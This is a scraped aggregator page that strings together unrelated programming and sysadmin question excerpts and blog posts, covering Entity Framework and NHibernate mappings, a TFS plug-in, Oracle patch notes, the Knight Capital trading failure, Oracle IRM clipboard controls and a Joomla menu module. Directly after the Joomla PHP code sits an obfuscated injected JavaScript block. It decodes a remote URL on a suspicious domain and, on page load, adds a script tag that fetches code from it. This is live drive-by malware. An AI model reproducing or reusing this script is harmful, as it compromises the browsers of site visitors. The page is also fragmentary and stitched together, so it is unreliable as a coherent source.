  • Unable to copy and paste (or cut and paste) photos already reduced in size from Word document into a

    - by Simon Child
Hello I cannot copy photos and paste them from a word document into the text of an email on my Sony Laptop having already substantially redcued the size of the photos using Microsoft Office Picture Manager. I can readily manage to perform this functjon from my work place PC but am presently working mostly from home. I am trying to email photos and text using a btinternet.com email address but have checked that I cannot perform the task using my alternate googlemail email address either. I can obviously highlight the relevant photographs but whenever I try to copy or cut them into the email text the paste function is disabled. Assistance would be much appreciated. Kind regards Simon

  • Renicing complex multithreaded applications in Linux

    - by Vi
Applications (especially big Java and C++ ones) often shows up as multiple lines in htop, each have separate PID and separate nice level. Also application can spawn a lot of child processes (like as in aptitude update), so I need to affect both parent one (to make new children have new priority) and child ones (to bring the effect immediately, not after the child terminates) How can I apply "renice" or "ionice" or "schedtool" to already launched big application?

  • mysqldump isn't able to export a specific database, phpMyAdmin crashes

    - by Devils Child
I'm experiencing problems with a database on my server (Note: All other databases work fine). Once I try to export it with mysqldump I get this error: # mysqldump -u root -pXXXXXXXXX databasename > /root/databasename.sql mysqldump: Couldn't execute 'show table status like 'apps'': Lost connection to MySQL server during query (2013) Also, phpMyAdmin throws an error when selecting this database and immediately logs out. However, the web site which uses this database works fine. I can also execute SELECT statements on the table named "apps" from the MySQL shell. I tried restarting the MySQL daemon as well as REPAIR DATABASE and REPAIR TABLE but the problem still persists. I had this problem before, then it disappeared somehow without me doing anything to resolve the issue. Now, the problem is back and I'm simply unable to create a backup of this database. Used software Debian 6.0.7 x64 MySQL 5.1.66-0 MySQL Version: mysql> SHOW VARIABLES LIKE "%version%"; +-------------------------+-------------------+ | Variable_name | Value | +-------------------------+-------------------+ | protocol_version | 10 | | version | 5.1.66-0+squeeze1 | | version_comment | (Debian) | | version_compile_machine | x86_64 | | version_compile_os | debian-linux-gnu | +-------------------------+-------------------+

  • Many to many self join through junction table

    - by Peter
I have an EF model that can self-reference through an intermediary class to define a parent/child relationship. I know how to do a pure many-to-many relationship using the Map command, but for some reason going through this intermediary class is causing problems with my mappings. The intermediary class provides additional properties for the relationship. See the classes, modelBinder logic and error below: public class Equipment { [Key] public int EquipmentId { get; set; } public virtual List<ChildRecord> Parents { get; set; } public virtual List<ChildRecord> Children { get; set; } } public class ChildRecord { [Key] public int ChildId { get; set; } [Required] public int Quantity { get; set; } [Required] public Equipment Parent { get; set; } [Required] public Equipment Child { get; set; } } I've tried building the mappings in both directions, though I only keep one set in at a time: modelBuilder.Entity<ChildRecord>() .HasRequired(x => x.Parent) .WithMany(x => x.Children ) .WillCascadeOnDelete(false); modelBuilder.Entity<ChildRecord>() .HasRequired(x => x.Child) .WithMany(x => x.Parents) .WillCascadeOnDelete(false); OR modelBuilder.Entity<Equipment>() .HasMany(x => x.Parents) .WithRequired(x => x.Child) .WillCascadeOnDelete(false); modelBuilder.Entity<Equipment>() .HasMany(x => x.Children) .WithRequired(x => x.Parent) .WillCascadeOnDelete(false); Regardless of which set I use, I get the error: The foreign key component 'Child' is not a declared property on type 'ChildRecord'. Verify that it has not been explicitly excluded from the model and that it is a valid primitive property. when I try do deploy my ef model to the database. If I build it without the modelBinder logic in place then I get two ID columns for Child and two ID columns for Parent in my ChildRecord table. This makes sense since it tries to auto create the navigation properties from Equipment and doesn't know that there are already properties in ChildRecord to fulfill this need. I tried using Data Annotations on the class, and no modelBuilder code, this failed with the same error as above: [Required] [ForeignKey("EquipmentId")] public Equipment Parent { get; set; } [Required] [ForeignKey("EquipmentId")] public Equipment Child { get; set; } AND [InverseProperty("Child")] public virtual List<ChildRecord> Parents { get; set; } [InverseProperty("Parent")] public virtual List<ChildRecord> Children { get; set; } I've looked at various other answers around the internet/SO, and the common difference seems to be that I am self joining where as all the answers I can find are for two different types. • Welcome Relief

    - by michael.seback
Government organizations are experiencing unprecedented demand for social services. The current economy continues to put immense stress on social service organizations. Increased need for food assistance, employment security, housing aid and other critical services is keeping agencies busier than ever. ... The Kansas Department of Labor (KDOL) uses Oracle's social services solution in its employment security program. KDOL has used Siebel Customer Relationship Management (CRM) for nearly a decade, and recently purchased Oracle Policy Automation to improve its services even further. KDOL implemented Siebel CRM in 2002, and has expanded its use of it over the years. The agency started with Siebel CRM in the call center and later moved it into case management. Siebel CRM has been a strong foundation for KDOL in the face of rising demand for unemployment benefits, numerous labor-related law changes, and an evolving IT environment. ... The result has been better service for constituents. "It's really enabled our staff to be more effective in serving clients," said Hubka. That's a trend the department plans to continue. "We're 100 percent down the path of Siebel, in terms of what we're doing in the future," Hubka added. "Their vision is very much in line with what we're planning on doing ourselves." ... Community Services is the leading agency responsible for the safety and well-being of children and young people within Australia's New South Wales (NSW) Government. Already a longtime Oracle Case Management user, Community Services recently implemented Oracle Policy Automation to ensure accurate, consistent decisions in the management of child safety. "Oracle Policy Automation has helped to provide a vehicle for the consistent application of the Government's 'Keep Them Safe' child protection action plan," said Kerry Holling, CIO for Community Services. "We believe this approach is a world-first in the structured decisionmaking space for child protection and we believe our department is setting an example that other child protection agencies will replicate." ... • Automatically create bug resolution task using the TFS 2010 API

    - by Bob Hardister
My customer requires bug resolution to be approved and tracked.  To minimize the overhead for developers I implemented a TFS 2010 server-side plug-in to automatically create a child resolution task for the bug when the “CCB” field is set to approved. The CCB field is a custom field.  I also added the story points field to the bug WIT for sizing purposes. Redundant tasks will not be created unless the bug title is changed or the prior task is closed. The program writes an audit trail to a log file visible in the TFS Admin Console Log view. Here’s the code. BugAutoTask.cs /* SPECIFICATION * When the CCB field on the bug is set to approved, create a child task where the task: * name = Resolve bug [ID] - [Title of bug] * assigned to = same as assigned to field on the bug * same area path * same iteration path * activity = Bug Resolution * original estimate = bug points * * The source code is used to build a dll (Ows.TeamFoundation.BugAutoTaskCreation.PlugIns.dll), * which needs to be copied to * C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\Plugins * on ALL TFS application-tier servers. * * Author: Bob Hardister. */ using System; using System.Collections.Generic; using System.IO; using System.Xml; using System.Text; using System.Diagnostics; using System.Linq; using Microsoft.TeamFoundation.Common; using Microsoft.TeamFoundation.Framework.Server; using Microsoft.TeamFoundation.WorkItemTracking.Client; using Microsoft.TeamFoundation.WorkItemTracking.Server; using Microsoft.TeamFoundation.Client; using System.Collections; namespace BugAutoTaskCreation { public class BugAutoTask : ISubscriber { public EventNotificationStatus ProcessEvent(TeamFoundationRequestContext requestContext, NotificationType notificationType, object notificationEventArgs, out int statusCode, out string statusMessage, out ExceptionPropertyCollection properties) { statusCode = 0; properties = null; statusMessage = String.Empty; // Error message for for tracing last code executed and optional fields string lastStep = "No field values found or set "; try { if ((notificationType == NotificationType.Notification) && (notificationEventArgs.GetType() == typeof(WorkItemChangedEvent))) { WorkItemChangedEvent workItemChange = (WorkItemChangedEvent)notificationEventArgs; // see ConnectToTFS() method below to select which TFS instance/collection // to connect to TfsTeamProjectCollection tfs = ConnectToTFS(); WorkItemStore wiStore = tfs.GetService<WorkItemStore>(); lastStep = lastStep + ": connection to TFS successful "; // Get the work item that was just changed by the user. • [Oracle Identity Manager] 11g R2 Bundle Patch 09 is Available!

    - by mustafakaya
Oracle Identity Manager Bundle Patch 09 is available now. You can download BP09 from here. Also, there is a important recommendation for BP08!  List of bugs fixed with BP09; Bug:12699224 : Trusted source reconciliation fails to create users with many reconciliation field mappings. Bug:14407437 : Provisioning through bulk request inserts null records into child tables. Bug:14493217 : Target resource reconciliation throws ORA-06512 error when the Descriptive field is mapped to a field that does not have a reconciliation field mapping. Bug:16044671 : User form customization fails if a UDF contains invalid character. Bug:16545968 : Modifying any attribute on a service account changes the account type as a primary account. Bug:16562633 : Oracle Identity Manager throws javax.el.elexceptions while viewing profile under direct report. Bug:16662834 : User not reprovisoned after user is deleted and created in the target with the same orclguid. Bug:16662905 : If an LOV field is required on an Application Instance form, no validation is enforced on the LOV field although it is required. Bug:16701873 : The Members tab of a role displays only enabled users and does not display disabled users. Bug:16862846 : When a notification is being sent, the mail ID in the Reply To field is set as the recipient's mail ID instead of the sender's mail ID. Bug:16824062 : When you use API to fetch or delete child data from an account, the child data row value is null. Therefore, child data is not returned. Bug:16912736 : There is a performance issue when the provisioned application instance details is opened for a user.

  • NHibernate Pitfalls: Cascades

    - by Ricardo Peres
This is part of a series of posts about NHibernate Pitfalls. See the entire collection here. For entities that have associations – one-to-one, one-to-many, many-to-one or many-to-many –, NHibernate needs to know what to do with their related entities, in three particular moments: when saving, updating or deleting. In particular, there are two possible behaviors: either ignore these related entities or cascade changes to them. NHibernate allows setting the cascade behavior for each association, and the default behavior is not to cascade (ignore). The possible cascade options are: None Ignore, this is the default Save-Update If the entity is being saved or updated, also save any related entities that are either not saved or have been modified and associate these related entities to the root entity. Generally safe Delete If the entity is being deleted, also delete the related entities. This is only useful for parent-child relations Delete-Orphan Identical to Delete, with the addition that if once related entity is removed from the association – orphaned –, also delete it. Also only for parent-child All Combination of Save-Update and Delete, usually that’s what we want (for parent-child relations, of course) All-Delete-Orphan Same as All plus delete any related entities who lose their relationship In summary, Save-Update is generally what you want in most cases. As for the Delete variations, they should only be used if the related entities depend on the root entity (parent-child), so that deleting the root entity and not their related entities would result in a constraint violation on the database.

  • Persisting simple tree with (Fluent-)NHibernate leads to System.InvalidCastException

    - by fudge
Hi there, there seems to be a problem with recursive data structures and (Fluent-)NHibernate or its just me, being a complete moron... here's the tree: public class SimpleNode { public SimpleNode () { this.Children = new List<SimpleNode> (); } public virtual SimpleNode Parent { get; private set; } public virtual List<SimpleNode> Children { get; private set; } public virtual void setParent (SimpleNode parent) { parent.AddChild (this); Parent = parent; } public virtual void AddChild (SimpleNode child) { this.Children.Add (child); } public virtual void AddChildren (IEnumerable<SimpleNode> children) { foreach (var child in children) { AddChild (child); } } } the mapping: public class SimpleNodeEntity : ClassMap<SimpleNode> { public SimpleNodeEntity () { Id (x => x.Id); References (x => x.Parent).Nullable (); HasMany (x => x.Children).Not.LazyLoad ().Inverse ().Cascade.All ().KeyNullable (); } } now, whenever I try to save a node, I get this: System.InvalidCastException: Cannot cast from source type to destination type. at (wrapper dynamic-method) SimpleNode. (object,object[],NHibernate.Bytecode.Lightweight.SetterCallback) at NHibernate.Bytecode.Lightweight.AccessOptimizer.SetPropertyValues (object, object[]) at NHibernate.Tuple.Entity.PocoEntityTuplizer.SetPropertyValuesWithOptimizer (object, object[]) My setup: Mono 2.8.1 (on OSX), NHibernate 2.1.2, FluentNHibernate 1.1.0

Would appreciate some feedback, thanks. <?php // no direct access defined('_JEXEC') or die('Restricted access'); if ( ! defined('modMainMenuXMLCallbackDefined') ) { function modMainMenuXMLCallback(&$node, $args) { $user = &JFactory::getUser(); $menu = &JSite::getMenu(); $active = $menu->getActive(); $path = isset($active) ? array_reverse($active->tree) : null; if (($args['end']) && ($node->attributes('level') >= $args['end'])) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } if ($node->name() == 'ul') { foreach ($node->children() as $child) { if ($child->attributes('access') > $user->get('aid', 0)) { $node->removeChild($child); } } } if (($node->name() == 'li') && isset($node->ul)) { $node->addAttribute('class', 'parent'); } if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' active'); } else { $node->addAttribute('class', 'active'); } } else { if (isset($args['children']) && !$args['children']) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } } if (($node->name() == 'li') && ($id = $node->attributes('id'))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' item'.$id); } else { $node->addAttribute('class', 'item'.$id); } } if (isset($path) && $node->attributes('id') == $path[0]) { $node->addAttribute('id', 'current'); } else { $node->removeAttribute('id'); } $node->removeAttribute('rel'); $node->removeAttribute('level'); $node->removeAttribute('access'); } define('modMainMenuXMLCallbackDefined', true); } modMainMenuHelper::render($params, 'modMainMenuXMLCallback'); <script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script> <!--793d57c076e95df45c451725e5dedf6f-->

  • Do I need to store a generic rotation point/radius for rotating around a point other than the origin for object transforms?

    - by Casey
I'm having trouble implementing a non-origin point rotation. I have a class Transform that stores each component separately in three 3D vectors for position, scale, and rotation. This is fine for local rotations based on the center of the object. The issue is how do I determine/concatenate non-origin rotations in addition to origin rotations. Normally this would be achieved as a Transform-Rotate-Transform for the center rotation followed by a Transform-Rotate-Transform for the non-origin point. The problem is because I am storing the individual components, the final Transform matrix is not calculated until needed by using the individual components to fill an appropriate Matrix. (See GetLocalTransform()) Do I need to store an additional rotation (and radius) for world rotations as well or is there a method of implementation that works while only using the single rotation value? • Dealing with external processes

    - by Jesse Aldridge
I've been working on a gui app that needs to manage external processes. Working with external processes leads to a lot of issues that can make a programmer's life difficult. I feel like maintenence on this app is taking an unacceptably long time. I've been trying to list the things that make working with external processes difficult so that I can come up with ways of mitigating the pain. This kind of turned into a rant which I thought I'd post here in order to get some feedback and to provide some guidance to anybody thinking about sailing into these very murky waters. Here's what I've got so far: Output from the child can get mixed up with output from the parent. This can make both outputs misleading and hard to read. It can be hard to tell what came from where. It becomes harder to figure out what's going on when things are asynchronous. Here's a contrived example: import textwrap, os, time from subprocess import Popen test_path = 'test_file.py' with open(test_path, 'w') as file: file.write(textwrap.dedent(''' import time for i in range(3): print 'Hello %i' % i time.sleep(1)''')) proc = Popen('python -B "%s"' % test_path) for i in range(3): print 'Hello %i' % i time.sleep(1) os.remove(test_path) I guess I could have the child process write its output to a file. But it can be annoying to have to open up a file every time I want to see the result of a print statement. If I have code for the child process I could add a label, something like print 'child: Hello %i', but it can be annoying to do that for every print. And it adds some noise to the output. And of course I can't do it if I don't have access to the code. I could manually manage the process output. But then you open up a huge can of worms with threads and polling and stuff like that. A simple solution is to treat processes like synchronous functions, that is, no further code executes until the process completes. In other words, make the process block. But that doesn't work if you're building a gui app. Which brings me to the next problem... Blocking processes cause the gui to become unresponsive. import textwrap, sys, os from subprocess import Popen from PyQt4.QtGui import * from PyQt4.QtCore import * test_path = 'test_file.py' with open(test_path, 'w') as file: file.write(textwrap.dedent(''' import time for i in range(3): print 'Hello %i' % i time.sleep(1)''')) app = QApplication(sys.argv) button = QPushButton('Launch process') def launch_proc(): # Can't move the window until process completes proc = Popen('python -B "%s"' % test_path) proc.communicate() button.connect(button, SIGNAL('clicked()'), launch_proc) button.show() app.exec_() os.remove(test_path) Qt provides a process wrapper of its own called QProcess which can help with this. You can connect functions to signals to capture output relatively easily. This is what I'm currently using. But I'm finding that all these signals behave suspiciously like goto statements and can lead to spaghetti code. I think I want to get sort-of blocking behavior by having the 'finished' signal from QProcess call a function containing all the code that comes after the process call. I think that should work but I'm still a bit fuzzy on the details... Stack traces get interrupted when you go from the child process back to the parent process. If a normal function screws up, you get a nice complete stack trace with filenames and line numbers. If a subprocess screws up, you'll be lucky if you get any output at all. You end up having to do a lot more detective work everytime something goes wrong. Speaking of which, output has a way of disappearing when dealing external processes. Like if you run something via the windows 'cmd' command, the console will pop up, execute the code, and then disappear before you have a chance to see the output. You have to pass the /k flag to make it stick around. Similar issues seem to crop up all the time. I suppose both problems 3 and 4 have the same root cause: no exception handling. Exception handling is meant to be used with functions, it doesn't work with processes. Maybe there's some way to get something like exception handling for processes? I guess that's what stderr is for? But dealing with two different streams can be annoying in itself. Maybe I should look into this more... Processes can hang and stick around in the background without you realizing it. So you end up yelling at your computer cuz it's going so slow until you finally bring up your task manager and see 30 instances of the same process hanging out in the background. Also, hanging background processes can interefere with other instances of the process in various fun ways, such as causing permissions errors by holding a handle to a file or someting like that. It seems like an easy solution to this would be to have the parent process kill the child process on exit if the child process didn't close itself. But if the parent process crashes, cleanup code might not get called and the child can be left hanging. Also, if the parent waits for the child to complete, and the child is in an infinite loop or something, you can end up with two hanging processes. This problem can tie in to problem 2 for extra fun, causing your gui to stop responding entirely and force you to kill everything with the task manager. F***ing quotes Parameters often need to be passed to processes. This is a headache in itself. Especially if you're dealing with file paths. Say... 'C:/My Documents/whatever/'. If you don't have quotes, the string will often be split at the space and interpreted as two arguments. If you need nested quotes you can use ' and ". But if you need to use more than two layers of quotes, you have to do some nasty escaping, for example: "cmd /k 'python \'path 1\' \'path 2\''". A good solution to this problem is passing parameters as a list rather than as a single string. Subprocess allows you to do this. Can't easily return data from a subprocess. You can use stdout of course. But what if you want to throw a print in there for debugging purposes? That's gonna screw up the parent if it's expecting output formatted a certain way. In functions you can print one string and return another and everything works just fine. Obscure command-line flags and a crappy terminal based help system. These are problems I often run into when using os level apps. Like the /k flag I mentioned, for holding a cmd window open, who's idea was that? Unix apps don't tend to be much friendlier in this regard. Hopefully you can use google or StackOverflow to find the answer you need. But if not, you've got a lot of boring reading and frusterating trial and error to do. External factors. This one's kind of fuzzy. But when you leave the relatively sheltered harbor of your own scripts to deal with external processes you find yourself having to deal with the "outside world" to a much greater extent. And that's a scary place. All sorts of things can go wrong. Just to give a random example: the cwd in which a process is run can modify it's behavior. There are probably other issues, but those are the ones I've written down so far. Any other snags you'd like to add? Any suggestions for dealing with these problems?

  • Best practice? Using DPM to backup VMs within each VM or through the host?

    - by andrew
We've got two Hyper-V hosts running multiple VMs (all flavors of Windows Servers). One of the VMs is running MS Data Protection Manager 2010, which runs beautifully (most of the time) and is connected to a separate NAS via iSCSI for the DPM storage. I noticed when I installed the DPM agent on the Hyper-V hosts, it enumerates the VMs in the DPM Protection listing. I don't want to burn through my storage space too fast with duplicate protection, so I was wondering: Is it recommended to back up VMs through the host, or is it better to install the DPM agent on each VM and backup as I would any other machine? It would seem as though most people (currently including me) do it the second way, but is there any advantage to including the entries under HyperV (Backup using Child Partition Snapshop)?

Possible Duplicate: Why do Google search results include pages disallowed in robots.txt? In my robots.txt I am disallowing a lot of URLs. Google webmaster tools says there're +750 URL blocked. The problem is the URLs are still showing on Google search. For example I have the following rule: Disallow: /entity/child-health/ But when I search some-keyword + child health the following URL shows up : http://www.sitename.com/entity/child-health/ Am I doing anything wrong? Is is possible for a URL to be blocked using robots.txt and still show up on search results?

  • A Knights Tale

    - by Phil Factor
There are so many lessons to be learned from the story of Knight Capital losing nearly half a billion dollars as a result of a deployment gone wrong. The Knight Capital Group (KCG N) was an American global financial services firm engaging in market making, electronic execution, and institutional sales and trading. According to the recent order (File No.3.15570) against Knight Capital by U.S. Securities and Exchange Commission?, Knight had, for many years used some software which broke up incoming “parent” orders into smaller “child” orders that were then transmitted to various exchanges or trading venues for execution. A tracking ‘cumulative quantity’ function counted the number of ‘child’ orders and stopped the process once the total of child orders matched the ‘parent’ and so the parent order had been completed. Back in the mists of time, some code had been added to it  which was excuted if a particular flag was set. It was called ‘power peg’ and seems to have had a similar design and purpose, but, one guesses, would have shared the same tracking function. This code had been abandoned in 2003, but never deleted. In 2005, The tracking function was moved to an earlier point in the main process. It would seem from the account that, from that point, had that flag ever been set, the old ‘Power Peg’ would have been executed like Godzilla bursting from the ice, making child orders without limit without any tracking function. It wasn’t, presumably because the software that set the flag was removed. In 2012, nearly a decade after ‘Power Peg’ was abandoned, Knight prepared a new module to their software to cope with the imminent Retail Liquidity Program (RLP) for the New York Stock Exchange. By this time, the flag had remained unused and someone made the fateful decision to reuse it, and replace the old ‘power peg’ code with this new RLP code. Had the two actions been done together in a single automated deployment, and the new deployment tested, all would have been well. It wasn’t. To quote… “Beginning on July 27, 2012, Knight deployed the new RLP code in SMARS in stages by placing it on a limited number of servers in SMARS on successive days. During the deployment of the new code, however, one of Knight’s technicians did not copy the new code to one of the eight SMARS computer servers. Knight did not have a second technician review this deployment and no one at Knight realized that the Power Peg code had not been removed from the eighth server, nor the new RLP code added. Knight had no written procedures that required such a review.” (para 15) “On August 1, Knight received orders from broker-dealers whose customers were eligible to participate in the RLP. The seven servers that received the new code processed these orders correctly. However, orders sent with the repurposed flag to the eighth server triggered the defective Power Peg code still present on that server. As a result, this server began sending child orders to certain trading centers for execution. Because the cumulative quantity function had been moved, this server continuously sent child orders, in rapid sequence, for each incoming parent order without regard to the number of share executions Knight had already received from trading centers. Although one part of Knight’s order handling system recognized that the parent orders had been filled, this information was not communicated to SMARS.” (para 16) SMARS routed millions of orders into the market over a 45-minute period, and obtained over 4 million executions in 154 stocks for more than 397 million shares. By the time that Knight stopped sending the orders, Knight had assumed a net long position in 80 stocks of approximately $3.5 billion and a net short position in 74 stocks of approximately $3.15 billion. Knight’s shares dropped more than 20% after traders saw extreme volume spikes in a number of stocks, including preferred shares of Wells Fargo (JWF) and semiconductor company Spansion (CODE). Both stocks, which see roughly 100,000 trade per day, had changed hands more than 4 million times by late morning. Ultimately, Knight lost over $460 million from this wild 45 minutes of trading. Obviously, I’m interested in all this because, at one time, I used to write trading systems for the City of London. Obviously, the US SEC is in a far better position than any of us to work out the failings of Knight’s IT department, and the report makes for painful reading. I can’t help observing, though, that even with the breathtaking mistakes all along the way, that a robust automated deployment process that was ‘all-or-nothing’, and tested from soup to nuts would have prevented the disaster. The report reads like a Greek Tragedy. All the way along one wants to shout ‘No! not that way!’ and ‘Aargh! Don’t do it!’. As the tragedy unfolds, the audience weeps for the players, trapped by a cruel fate. All application development and deployment requires defense in depth. All IT goes wrong occasionally, but if there is a culture of defensive programming throughout, the consequences are usually containable. For financial systems, these defenses are required by statute, and ignored only by the foolish. Knight’s mistakes weren’t made by just one hapless sysadmin, but were progressive errors by an  IT culture spanning at least ten years.  One can spell these out, but I think they’re obvious. One can only hope that the industry studies what happened in detail, learns from the mistakes, and draws the right conclusions.

  • Multiple Document Interfaces in Visual Basic

What is Multiple Document Interface (MDI)? In most VB.NET applications, it is using a single document interface (SDI). In this type of interface, every window is unique to aother window. But in multiple document interface, it works by having one parent window with child windows under it. See the screenshot below: As you can see, there is one parent window (in gray color) and there are 3 child windows (in blue, violet and orange color). You can have more than 3 child windows depending on your application requirements. But you can only have one parent window. Depending on the design of your MDI...

  • Magento, NGINX, PHP-FPM, APC, MEMCACHED, 16gb Ram CentOS, Spiking PHP-FPM to 100% CPU

    - by Terry Dunford
I have been trying to resolve my issue of spiking cpu caused by php-fpm processes. I've reduced the php-fpm config settings to: pm = ondemand pm.max_children = 12 pm.start_servers = 2 pm.min_spare_servers = 2 pm.max_spare_servers = 10 pm.max_requests = 500 php_admin_value[memory_limit] = 128M Problem still exists. I'm running a Joomla main site (which is having no problems) and a Magento store in a sub-directory. My server is a Linux CentOS, running NGINX, APC, Memcached, Full Page Cache and php-fpm. My server has 8 cores and 16gb dedicated ram. My host has shut down my server several times the past week because my php-fpm processes are consuming the entire network. A lot of the individual php-fpm processes are getting over 50% cpu. I've hired several "professionals" and none of them was able to help me, so now broke and stumped, I'm turning to you guys for help. So any suggestions would be greatly appreciated. • Granular Clipboard Control in Oracle IRM

    - by martin.abrahams
One of the main leak prevention controls that customers are looking for is clipboard control. After all, there is little point in controlling access to a document if authorised users can simply make unprotected copies by use of the cut and paste mechanism. Oddly, for such a fundamental requirement, many solutions only offer very simplistic clipboard control - and require the customer to make an awkward choice between usability and security. In many cases, clipboard control is simply an ON-OFF option. By turning the clipboard OFF, you disable one of the most valuable edit functions known to man. Try working for any length of time without copying and pasting, and you'll soon appreciate how valuable that function is. Worse, some solutions disable the clipboard completely - not just for the protected document but for all of the various applications you have open at the time. Normal service is only resumed when you close the protected document. In this way, policy enforcement bleeds out of the particular assets you need to protect and interferes with the entire user experience. On the other hand, turning the clipboard ON satisfies a fundamental usability requirement - but also makes it really easy for users to create unprotected copies of sensitive information, maliciously or otherwise. All they need to do is paste into another document. If creating unprotected copies is this simple, you have to question how much you are really gaining by applying protection at all. You may not be allowed to edit, forward, or print the protected asset, but all you need to do is create a copy and work with that instead. And that activity would not be tracked in any way. So, a simple ON-OFF control creates a real tension between usability and security. If you are only using IRM on a small scale, perhaps security can outweigh usability - the business can put up with the restriction if it only applies to a handful of important documents. But try extending protection to large numbers of documents and large user communities, and the restriction rapidly becomes really unwelcome. I am aware of one solution that takes a different tack. Rather than disable the clipboard, pasting is always permitted, but protection is automatically applied to any document that you paste into. At first glance, this sounds great - protection travels with the content. However, at any scale this model may not be so appealing once you've had to deal with support calls from users who have accidentally applied protection to documents that really don't need it - which would be all too easily done. This may help control leakage, but it also pollutes the system with documents that have policies applied with no obvious rhyme or reason, and it can seriously inconvenience the business by making non-sensitive documents difficult to access. And what policy applies if you paste some protected content into an already protected document? Which policy applies? There are no prizes for guessing that Oracle IRM takes a rather different approach. The Oracle IRM Approach Oracle IRM offers a spectrum of clipboard controls between the extremes of ON and OFF, and it leverages the classification-based rights model to give granular control that satisfies both security and usability needs. Firstly, we take it for granted that if you have EDIT rights, of course you can use the clipboard within a given document. Why would we force you to retype a piece of content that you want to move from HERE... to HERE...? If the pasted content remains in the same document, it is equally well protected whether it be at the beginning, middle, or end - or all three. So, the first point is that Oracle IRM always enables the clipboard if you have the right to edit the file. Secondly, whether we enable or disable the clipboard, we only affect the protected document. That is, you can continue to use the clipboard in the usual way for unprotected documents and applications regardless of whether the clipboard is enabled or disabled for the protected document(s). And if you have multiple protected documents open, each may have the clipboard enabled or disabled independently, according to whether you have Edit rights for each. So, even for the simplest cases - the ON-OFF cases - Oracle IRM adds value by containing the effect to the protected documents rather than to the whole desktop environment. Now to the granular options between ON and OFF. Thanks to our classification model, we can define rights that enable pasting between documents in the same classification - ie. between documents that are protected by the same policy. So, if you are working on this month's financial report and you want to pull some data from last month's report, you can simply cut and paste between the two documents. The two documents are classified the same way, subject to the same policy, so the content is equally safe in both documents. However, if you try to paste the same data into an unprotected document or a document in a different classification, you can be prevented. Thus, the control balances legitimate user requirements to allow pasting with legitimate information security concerns to keep data protected. We can take this further. You may have the right to paste between related classifications of document. So, the CFO might want to copy some financial data into a board document, where the two documents are sealed to different classifications. The CFO's rights may well allow this, as it is a reasonable thing for a CFO to want to do. But policy might prevent the CFO from copying the same data into a classification that is accessible to external parties. The above option, to copy between classifications, may be for specific classifications or open-ended. That is, your rights might enable you to go from A to B but not to C, or you might be allowed to paste to any classification subject to your EDIT rights. As for so many features of Oracle IRM, our classification-based rights model makes this type of granular control really easy to manage - you simply define that pasting is permitted between classifications A and B, but omit C. Or you might define that pasting is permitted between all classifications, but not to unprotected locations. The classification model enables millions of documents to be controlled by a few such rules. Finally, you MIGHT have the option to paste anywhere - such that unprotected copies may be created. This is rare, but a legitimate configuration for some users, some use cases, and some classifications - but not something that you have to permit simply because the alternative is too restrictive. As always, these rights are defined in user roles - so different users are subject to different clipboard controls as required in different classifications. So, where most solutions offer just two clipboard options - ON-OFF or ON-but-encrypt-everything-you-touch - Oracle IRM offers real granularity that leverages our classification model. Indeed, I believe it is the lack of a classification model that makes such granularity impractical for other IRM solutions, because the matrix of rules for controlling pasting would be impossible to manage - there are so many documents to consider, and more are being created all the time.

  • Colorbox modal opening/closing another Colorbox modal

    - by CmdrTallen
